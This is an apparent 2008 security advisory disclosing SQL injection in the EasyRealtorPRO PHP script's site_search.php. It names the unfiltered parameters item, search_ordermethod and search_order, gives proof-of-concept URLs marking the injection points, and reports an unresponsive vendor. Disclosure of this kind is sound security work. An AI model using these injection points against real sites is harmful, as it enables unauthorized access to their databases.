Original article: http://www.davidsopas.com/2008/09/sql-injection-in-easyrealtorpro/ "EasyRealtorPRO 2008 provides you with all features you need to setup your own business oriented real estate website on your own domain name. Our support team will install the script on your server and then you can start selling packages to home sellers at ease." in vendor website easyrealtorpro.com This PHP script is vulnerable to SQL Injection in site_search.php file. Manipulating the unfiltred variables, a user can execute SQL commands to gather other information. The problem is located under the variables item, search_ordermethod and search_order. Proof of concept: site_search.php?search_purpose=sale&search_type=& search_price_min=&search_price_max=&search_bedroom=1& search_bathroom=1&search_city=&search_state=& search_zip=&search_radius=&search_country=& search_order=type&search_ordermethod=asc&page=2& item=5'SQL INJECTION site_search.php?search_purpose=sale&search_type=& search_price_min=&search_price_max=&search_bedroom=1& search_bathroom=1&search_city=&search_state=& search_zip=&search_radius=&search_country=& search_order=type&search_ordermethod=asc'SQL INJECTION& page=2&item=5 site_search.php?search_purpose=sale&search_type=& search_price_min=&search_price_max=&search_bedroom=1& search_bathroom=1&search_city=&search_state=& search_zip=&search_radius=&search_country=& search_order=type'SQL INJECTION&search_ordermethod=asc& page=2&item=5 Solution: The vendor was contacted 2 weeks ago and still not reply to my email. It can be fixed with the sanitize of the variables.
